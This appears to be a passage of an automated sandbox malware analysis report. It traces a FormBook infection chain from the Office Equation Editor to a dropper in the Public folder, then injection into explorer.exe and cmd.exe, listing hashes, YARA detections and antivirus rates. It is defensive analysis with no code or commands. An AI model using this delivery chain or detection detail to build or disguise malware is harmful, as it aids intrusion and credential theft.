                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Analysis Process: vbc.exe PID: 2540 Parent PID: 2016

                                                  General

                                                  Start time:20:21:49
                                                  Start date:13/01/2022
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\Public\vbc.exe"
                                                  Imagebase:0x11a0000
                                                  File size:417792 bytes
                                                  MD5 hash:83AC585E99B527EEB278702F8F711568
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 44%, ReversingLabs
                                                  Reputation:low

                                                  Analysis Process: vbc.exe PID: 2712 Parent PID: 2540

                                                  General

                                                  Start time:20:21:52
                                                  Start date:13/01/2022
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\Public\vbc.exe
                                                  Imagebase:0x11a0000
                                                  File size:417792 bytes
                                                  MD5 hash:83AC585E99B527EEB278702F8F711568
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  Analysis Process: explorer.exe PID: 1764 Parent PID: 2712

                                                  General

                                                  Start time:20:21:55
                                                  Start date:13/01/2022
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0xffa10000
                                                  File size:3229696 bytes
                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Analysis Process: cmd.exe PID: 2568 Parent PID: 1764

                                                  General

                                                  Start time:20:22:08
                                                  Start date:13/01/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                  Imagebase:0x49d90000
                                                  File size:302592 bytes
                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >